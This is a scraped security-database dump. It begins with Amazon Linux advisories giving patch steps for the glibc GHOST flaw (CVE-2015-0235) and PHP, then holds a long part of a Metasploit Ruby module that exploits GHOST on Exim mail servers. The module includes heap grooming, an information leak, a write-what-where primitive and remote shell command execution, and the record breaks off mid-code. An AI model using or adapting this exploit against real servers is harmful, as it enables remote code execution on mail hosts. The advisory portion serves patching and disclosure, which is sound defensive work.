Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.09 repositories, _glibc-2.12-1.149.49.amzn1_ addresses the CVE. Running _yum clean all_ followed by _yum update glibc_ will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs [\"locked\"](<https://aws.amazon.com/amazon-linux-ami/faqs/#lock>) to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run _yum clean all_ followed by _yum --releasever=2013.09 update glibc_ to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. Note that you may need to run _yum clean all_ first. Once this update has been applied, _reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version_. 
On new instance launches, you should still reboot after cloud-init has [automatically applied](<https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update>) this update.\n\n \n\n\n**New Packages:**\n \n \n i686: \n glibc-static-2.17-55.93.amzn1.i686 \n glibc-common-2.17-55.93.amzn1.i686 \n nscd-2.17-55.93.amzn1.i686 \n glibc-devel-2.17-55.93.amzn1.i686 \n glibc-2.17-55.93.amzn1.i686 \n glibc-utils-2.17-55.93.amzn1.i686 \n glibc-debuginfo-2.17-55.93.amzn1.i686 \n glibc-headers-2.17-55.93.amzn1.i686 \n glibc-debuginfo-common-2.17-55.93.amzn1.i686 \n \n src: \n glibc-2.17-55.93.amzn1.src \n \n x86_64: \n glibc-utils-2.17-55.93.amzn1.x86_64 \n nscd-2.17-55.93.amzn1.x86_64 \n glibc-debuginfo-2.17-55.93.amzn1.x86_64 \n glibc-headers-2.17-55.93.amzn1.x86_64 \n glibc-debuginfo-common-2.17-55.93.amzn1.x86_64 \n glibc-common-2.17-55.93.amzn1.x86_64 \n glibc-static-2.17-55.93.amzn1.x86_64 \n glibc-2.17-55.93.amzn1.x86_64 \n glibc-devel-2.17-55.93.amzn1.x86_64 \n \n \n", "modified": "2015-01-28T19:57:00", "published": "2015-01-28T19:57:00", "id": "ALAS-2015-473", "href": "https://alas.aws.amazon.com/ALAS-2015-473.html", "title": "Critical: glibc", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-02T16:55:11", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. ([CVE-2015-0235 __](<https://access.redhat.com/security/cve/CVE-2015-0235>))\n\nUse after free vulnerability was reported in PHP DateTimeZone. 
([CVE-2015-0273 __](<https://access.redhat.com/security/cve/CVE-2015-0273>))\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n php54-5.4.38-1.66.amzn1.i686 \n php54-pspell-5.4.38-1.66.amzn1.i686 \n php54-mcrypt-5.4.38-1.66.amzn1.i686 \n php54-debuginfo-5.4.38-1.66.amzn1.i686 \n php54-common-5.4.38-1.66.amzn1.i686 \n php54-mysql-5.4.38-1.66.amzn1.i686 \n php54-soap-5.4.38-1.66.amzn1.i686 \n php54-mssql-5.4.38-1.66.amzn1.i686 \n php54-mbstring-5.4.38-1.66.amzn1.i686 \n php54-tidy-5.4.38-1.66.amzn1.i686 \n php54-enchant-5.4.38-1.66.amzn1.i686 \n php54-mysqlnd-5.4.38-1.66.amzn1.i686 \n php54-xml-5.4.38-1.66.amzn1.i686 \n php54-pgsql-5.4.38-1.66.amzn1.i686 \n php54-fpm-5.4.38-1.66.amzn1.i686 \n php54-cli-5.4.38-1.66.amzn1.i686 \n php54-imap-5.4.38-1.66.amzn1.i686 \n php54-intl-5.4.38-1.66.amzn1.i686 \n php54-process-5.4.38-1.66.amzn1.i686 \n php54-snmp-5.4.38-1.66.amzn1.i686 \n php54-devel-5.4.38-1.66.amzn1.i686 \n php54-bcmath-5.4.38-1.66.amzn1.i686 \n php54-recode-5.4.38-1.66.amzn1.i686 \n php54-dba-5.4.38-1.66.amzn1.i686 \n php54-ldap-5.4.38-1.66.amzn1.i686 \n php54-embedded-5.4.38-1.66.amzn1.i686 \n php54-gd-5.4.38-1.66.amzn1.i686 \n php54-pdo-5.4.38-1.66.amzn1.i686 \n php54-xmlrpc-5.4.38-1.66.amzn1.i686 \n php54-odbc-5.4.38-1.66.amzn1.i686 \n \n src: \n php54-5.4.38-1.66.amzn1.src \n \n x86_64: \n php54-ldap-5.4.38-1.66.amzn1.x86_64 \n php54-dba-5.4.38-1.66.amzn1.x86_64 \n php54-pspell-5.4.38-1.66.amzn1.x86_64 \n php54-common-5.4.38-1.66.amzn1.x86_64 \n php54-devel-5.4.38-1.66.amzn1.x86_64 \n php54-pdo-5.4.38-1.66.amzn1.x86_64 \n php54-mcrypt-5.4.38-1.66.amzn1.x86_64 \n php54-mysql-5.4.38-1.66.amzn1.x86_64 \n php54-recode-5.4.38-1.66.amzn1.x86_64 \n php54-5.4.38-1.66.amzn1.x86_64 \n php54-enchant-5.4.38-1.66.amzn1.x86_64 \n php54-mssql-5.4.38-1.66.amzn1.x86_64 \n php54-intl-5.4.38-1.66.amzn1.x86_64 \n php54-odbc-5.4.38-1.66.amzn1.x86_64 \n 
php54-bcmath-5.4.38-1.66.amzn1.x86_64 \n php54-imap-5.4.38-1.66.amzn1.x86_64 \n php54-snmp-5.4.38-1.66.amzn1.x86_64 \n php54-debuginfo-5.4.38-1.66.amzn1.x86_64 \n php54-gd-5.4.38-1.66.amzn1.x86_64 \n php54-tidy-5.4.38-1.66.amzn1.x86_64 \n php54-fpm-5.4.38-1.66.amzn1.x86_64 \n php54-xmlrpc-5.4.38-1.66.amzn1.x86_64 \n php54-embedded-5.4.38-1.66.amzn1.x86_64 \n php54-process-5.4.38-1.66.amzn1.x86_64 \n php54-cli-5.4.38-1.66.amzn1.x86_64 \n php54-pgsql-5.4.38-1.66.amzn1.x86_64 \n php54-mysqlnd-5.4.38-1.66.amzn1.x86_64 \n php54-soap-5.4.38-1.66.amzn1.x86_64 \n php54-xml-5.4.38-1.66.amzn1.x86_64 \n php54-mbstring-5.4.38-1.66.amzn1.x86_64 \n \n \n", "modified": "2015-03-13T10:03:00", "published": "2015-03-13T10:03:00", "id": "ALAS-2015-493", "href": "https://alas.aws.amazon.com/ALAS-2015-493.html", "title": "Critical: php54", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-10T07:05:00", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2015-03-19T00:00:00", "published": "2015-03-19T00:00:00", "id": "1337DAY-ID-23392", "href": "https://0day.today/exploit/description/23392", "type": "zdt", "title": "Exim GHOST (glibc gethostbyname) Buffer Overflow Exploit", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit4 < Msf::Exploit::Remote\r\n Rank = GreatRanking\r\n \r\n include Msf::Exploit::Remote::Tcp\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',\r\n 'Description' => %q(\r\n This module remotely exploits CVE-2015-0235 (a.k.a. 
GHOST, a heap-based\r\n buffer overflow in the GNU C Library's gethostbyname functions) on x86\r\n and x86_64 GNU/Linux systems that run the Exim mail server. Technical\r\n information about the exploitation can be found in the original GHOST\r\n advisory, and in the source code of this module.\r\n ------------------------------------------------------------------------\r\n SERVER-SIDE REQUIREMENTS (Exim)\r\n ------------------------------------------------------------------------\r\n The remote system must use a vulnerable version of the GNU C Library:\r\n the first exploitable version is glibc-2.6, the last exploitable version\r\n is glibc-2.17; older versions might be exploitable too, but this module\r\n depends on the newer versions' fd_nextsize (a member of the malloc_chunk\r\n structure) to remotely obtain the address of Exim's smtp_cmd_buffer in\r\n the heap.\r\n ------------------------------------------------------------------------\r\n The remote system must run the Exim mail server: the first exploitable\r\n version is exim-4.77; older versions might be exploitable too, but this\r\n module depends on the newer versions' 16-KB smtp_cmd_buffer to reliably\r\n set up the heap as described in the GHOST advisory.\r\n ------------------------------------------------------------------------\r\n The remote Exim mail server must be configured to perform extra security\r\n checks against its SMTP clients: either the helo_try_verify_hosts or the\r\n helo_verify_hosts option must be enabled; the \"verify = helo\" ACL might\r\n be exploitable too, but is unpredictable and therefore not supported by\r\n this module.\r\n ------------------------------------------------------------------------\r\n CLIENT-SIDE REQUIREMENTS (Metasploit)\r\n ------------------------------------------------------------------------\r\n This module's \"exploit\" method requires the SENDER_HOST_ADDRESS option\r\n to be set to the IPv4 address of the SMTP client (Metasploit), as seen\r\n by the 
SMTP server (Exim); additionally, this IPv4 address must have\r\n both forward and reverse DNS entries that match each other\r\n (Forward-Confirmed reverse DNS).\r\n ------------------------------------------------------------------------\r\n The remote Exim server might be exploitable even if the Metasploit\r\n client has no FCrDNS, but this module depends on Exim's sender_host_name\r\n variable to be set in order to reliably control the state of the remote\r\n heap.\r\n ------------------------------------------------------------------------\r\n TROUBLESHOOTING\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (nil)\" failure: the SENDER_HOST_ADDRESS option\r\n was not specified.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\" failure:\r\n the SENDER_HOST_ADDRESS option was specified, but not in IPv4\r\n dotted-decimal notation.\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\" or\r\n \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\" failure: the\r\n SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP\r\n client (Metasploit), as seen by the SMTP server (Exim).\r\n ------------------------------------------------------------------------\r\n \"bad SENDER_HOST_ADDRESS (no FCrDNS)\" failure: the IPv4 address of the\r\n SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.\r\n ------------------------------------------------------------------------\r\n \"not vuln? old glibc? (no leaked_arch)\" failure: the remote Exim server\r\n is either not vulnerable, or not exploitable (glibc versions older than\r\n glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).\r\n ------------------------------------------------------------------------\r\n \"NUL, CR, LF in addr? 
(no leaked_addr)\" failure: Exim's heap address\r\n contains bad characters (NUL, CR, LF) and was therefore mangled during\r\n the information leak; this exploit is able to reconstruct most of these\r\n addresses, but not all (worst-case probability is ~1/85, but could be\r\n further improved).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a nil reply, but no shell: the remote\r\n Unix command was executed, but spawned a bind-shell or a reverse-shell\r\n that failed to connect (maybe because of a firewall, or a NAT, etc).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a non-nil reply, and no shell: the\r\n remote Unix command was executed, but failed to spawn the shell (maybe\r\n because the setsid command doesn't exist, or awk isn't gawk, or netcat\r\n doesn't support the -6 or -e option, or telnet doesn't support the -z\r\n option, etc).\r\n ------------------------------------------------------------------------\r\n Comments and questions are welcome!\r\n ),\r\n 'Author' => ['Qualys, Inc. 
<qsa[at]qualys.com>'],\r\n 'License' => BSD_LICENSE,\r\n 'References' => [\r\n ['CVE', '2015-0235'],\r\n ['US-CERT-VU', '967332'],\r\n ['OSVDB', '117579'],\r\n ['BID', '72325'],\r\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']\r\n ],\r\n 'DisclosureDate' => 'Jan 27 2015',\r\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\r\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\r\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^\r\n 'Payload' => {\r\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\r\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\r\n 'DisableNops' => true,\r\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n \r\n register_options([\r\n Opt::RPORT(25),\r\n OptAddress.new('SENDER_HOST_ADDRESS', [false,\r\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\r\n ], self.class)\r\n \r\n register_advanced_options([\r\n OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])\r\n ], self.class)\r\n end\r\n \r\n def check\r\n # for now, no information about the vulnerable state of the target\r\n check_code = Exploit::CheckCode::Unknown\r\n \r\n begin\r\n # not exploiting, just checking\r\n smtp_connect(false)\r\n \r\n # malloc()ate gethostbyname's buffer, and\r\n # make sure its next_chunk isn't the top chunk\r\n \r\n 9.times do\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\r\n smtp_recv(HELO_CODES)\r\n end\r\n \r\n # overflow (4 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x00303030\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\r\n # from now on, an exception means vulnerable\r\n check_code = 
Exploit::CheckCode::Vulnerable\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n \r\n # realloc()ate gethostbyname's buffer, and\r\n # crash (old glibc) or abort (new glibc)\r\n # on the overwritten size field\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n # a vulnerable target should've crashed by now\r\n check_code = Exploit::CheckCode::Safe\r\n \r\n rescue\r\n peer = \"#{rhost}:#{rport}\"\r\n vprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\")\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n return check_code\r\n end\r\n \r\n def exploit\r\n unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n print_status(\"Checking if target is vulnerable...\")\r\n fail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable\r\n print_good(\"Target is vulnerable.\")\r\n end\r\n information_leak\r\n code_execution\r\n end\r\n \r\n private\r\n \r\n HELO_CODES = '250|451|550'\r\n ANY_CODE = '[0-9]{3}'\r\n \r\n MIN_HEAP_SHIFT = 80\r\n MIN_HEAP_SIZE = 128 * 1024\r\n MAX_HEAP_SIZE = 1024 * 1024\r\n \r\n # Exim\r\n ALIGNMENT = 8\r\n STORE_BLOCK_SIZE = 8192\r\n STOREPOOL_MIN_SIZE = 256\r\n \r\n LOG_BUFFER_SIZE = 8192\r\n BIG_BUFFER_SIZE = 16384\r\n \r\n SMTP_CMD_BUFFER_SIZE = 16384\r\n IN_BUFFER_SIZE = 8192\r\n \r\n # GNU C Library\r\n PREV_INUSE = 0x1\r\n NS_MAXDNAME = 1025\r\n \r\n # Linux\r\n MMAP_MIN_ADDR = 65536\r\n \r\n def information_leak\r\n print_status(\"Trying information leak...\")\r\n leaked_arch = nil\r\n leaked_addr = []\r\n \r\n # try different heap_shift values, in case Exim's heap address 
contains\r\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\r\n # we'll keep the longest one (the least likely to have been truncated)\r\n \r\n 16.times do\r\n done = catch(:another_heap_shift) do\r\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\r\n print_debug(\"#{{ heap_shift: heap_shift }}\")\r\n \r\n # write the malloc_chunk header at increasing offsets (8-byte step),\r\n # until we overwrite the \"503 sender not yet given\" error message\r\n \r\n 128.step(256, 8) do |write_offset|\r\n error = try_information_leak(heap_shift, write_offset)\r\n print_debug(\"#{{ write_offset: write_offset, error: error }}\")\r\n throw(:another_heap_shift) if not error\r\n next if error == \"503 sender not yet given\"\r\n \r\n # try a few more offsets (allows us to double-check things,\r\n # and distinguish between 32-bit and 64-bit machines)\r\n \r\n error = [error]\r\n 1.upto(5) do |i|\r\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\r\n throw(:another_heap_shift) if not error[i]\r\n end\r\n print_debug(\"#{{ error: error }}\")\r\n \r\n _leaked_arch = leaked_arch\r\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\r\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\r\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\r\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86_64\r\n \r\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\r\n (error[1].empty? 
or (error[1].unpack('C')[0] & 3) == 0) and # fd\r\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\r\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86\r\n \r\n else\r\n throw(:another_heap_shift)\r\n end\r\n print_debug(\"#{{ leaked_arch: leaked_arch }}\")\r\n fail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\r\n \r\n # try different large-bins: most of them should be empty,\r\n # so keep the most frequent fd_nextsize address\r\n # (a pointer to the malloc_chunk itself)\r\n \r\n count = Hash.new(0)\r\n 0.upto(9) do |last_digit|\r\n error = try_information_leak(heap_shift, write_offset, last_digit)\r\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\r\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\r\n count[error] += 1\r\n end\r\n print_debug(\"#{{ count: count }}\")\r\n throw(:another_heap_shift) if count.empty?\r\n \r\n # convert count to a nested array of [key, value] arrays and sort it\r\n error_count = count.sort { |a, b| b[1] <=> a[1] }\r\n error_count = error_count.first # most frequent\r\n error = error_count[0]\r\n count = error_count[1]\r\n throw(:another_heap_shift) unless count >= 6 # majority\r\n leaked_addr.push({ error: error, shift: heap_shift })\r\n \r\n # common-case shortcut\r\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\r\n (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\r\n leaked_addr = [leaked_addr.last] # use this one, and not another\r\n throw(:another_heap_shift, true) # done\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n break if done\r\n end\r\n \r\n fail_with(\"infoleak\", \"not vuln? old glibc? 
(no leaked_arch)\") if leaked_arch.nil?\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\r\n \r\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\r\n leaked_addr = leaked_addr.first # longest\r\n error = leaked_addr[:error]\r\n shift = leaked_addr[:shift]\r\n \r\n leaked_addr = 0\r\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\r\n break if i >= error.length\r\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\r\n end\r\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\r\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\r\n \r\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\r\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\r\n @leaked = { arch: leaked_arch, addr: leaked_addr }\r\n end\r\n \r\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0\r\n fail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0\r\n fail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\r\n \r\n smtp_connect\r\n \r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\r\n 
smtp_recv(250)\r\n \r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\r\n smtp_recv(250)\r\n \r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\r\n begin # ^ 0x30 | PREV_INUSE\r\n smtp_recv(HELO_CODES)\r\n \r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n \r\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(503, 'sender not yet given')\r\n \r\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n \r\n smtp_send(\"DATA\")\r\n reply = smtp_recv(503)\r\n \r\n lines = reply[:lines]\r\n fail if lines.size <= 3\r\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\r\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\r\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\r\n \r\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\r\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\r\n # but happens with lower probability)\r\n \r\n error = lines[+1..-3].join(\"\")\r\n error.sub!(/\\A503-/mn, \"\")\r\n error.sub!(/\\r\\n\\z/mn, \"\")\r\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\r\n return error\r\n \r\n rescue\r\n return nil\r\n end\r\n \r\n ensure\r\n smtp_disconnect\r\n end\r\n \r\n def code_execution\r\n print_status(\"Trying code execution...\")\r\n \r\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\r\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\r\n # that rogue 
child processes cannot use them.\r\n \r\n fail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded\r\n fail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\r\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\r\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\r\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\r\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\r\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\r\n print_debug(command)\r\n \r\n # don't try to execute commands directly, try a very simple ACL first,\r\n # to distinguish between exploitation-problems and shellcode-problems\r\n \r\n acldrop = \"drop message=\"\r\n message = rand_text_alpha(command.length - acldrop.length)\r\n acldrop += message\r\n \r\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 
32 : 64)\r\n max_heap_addr = @leaked[:addr]\r\n min_heap_addr = nil\r\n survived = nil\r\n \r\n # we later fill log_buffer and big_buffer with alpha chars,\r\n # which creates a safe-zone at the beginning of the heap,\r\n # where we can't possibly crash during our brute-force\r\n \r\n # 4, because 3 copies of sender_helo_name, and step_len;\r\n # start big, but refine little by little in case\r\n # we crash because we overwrite important data\r\n \r\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\r\n loop do\r\n \r\n sender_helo_name = \"A\" * helo_len\r\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\r\n \r\n # the 3 copies of sender_helo_name, allocated by\r\n # host_build_sender_fullhost() in POOL_PERM memory\r\n \r\n helo_ip_size = ALIGNMENT +\r\n sender_helo_name[+1..-2].length\r\n \r\n sender_fullhost_size = ALIGNMENT +\r\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\r\n \r\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\r\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\r\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\r\n ).length\r\n \r\n # fit completely into the safe-zone\r\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\r\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\r\n loop do\r\n \r\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\r\n # with alpha chars, which creates another safe-zone at the end of the heap)\r\n heap_addr = max_heap_addr\r\n loop do\r\n \r\n # try harder the first time around: we obtain better\r\n # heap boundaries, and we usually hit our ACL faster\r\n \r\n (min_heap_addr ? 
1 : 2).times do\r\n \r\n # try the same heap_addr several times, but with different random offsets,\r\n # in case we crash because our hijacked storeblock's length field is too small\r\n # (we don't control what's stored at heap_addr)\r\n \r\n rand_offset = rand(max_rand_offset)\r\n print_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\r\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\") if reply\r\n \r\n if reply and\r\n reply[:code] == \"550\" and\r\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\r\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\r\n print_good(\"Brute-force SUCCESS\")\r\n print_good(\"Please wait for reply...\")\r\n # execute command this time, not acldrop\r\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\")\r\n return handler\r\n end\r\n \r\n if not min_heap_addr\r\n if reply\r\n fail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\r\n survived = heap_addr\r\n else\r\n if ((survived ? 
survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\r\n # survived should point to our safe-zone at the beginning of the heap\r\n fail_with(\"codeexec\", \"never survived\") if not survived\r\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\r\n min_heap_addr = survived\r\n end\r\n end\r\n end\r\n end\r\n \r\n heap_addr -= step_len\r\n break if min_heap_addr and heap_addr < min_heap_addr\r\n end\r\n \r\n break if step_len < 1024\r\n step_len /= 2\r\n end\r\n \r\n helo_len /= 2\r\n break if helo_len < 1024\r\n # ^ otherwise the 3 copies of sender_helo_name will\r\n # fit into the current_block of POOL_PERM memory\r\n end\r\n fail_with(\"codeexec\", \"Brute-force FAILURE\")\r\n end\r\n \r\n # our write-what-where primitive\r\n def try_code_execution(len, what, where)\r\n fail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len\r\n fail_with(\"codeexec\", \"#{where} < 0\") if where < 0\r\n \r\n x86 = (@leaked[:arch] == ARCH_X86)\r\n min_heap_shift = (x86 ? 
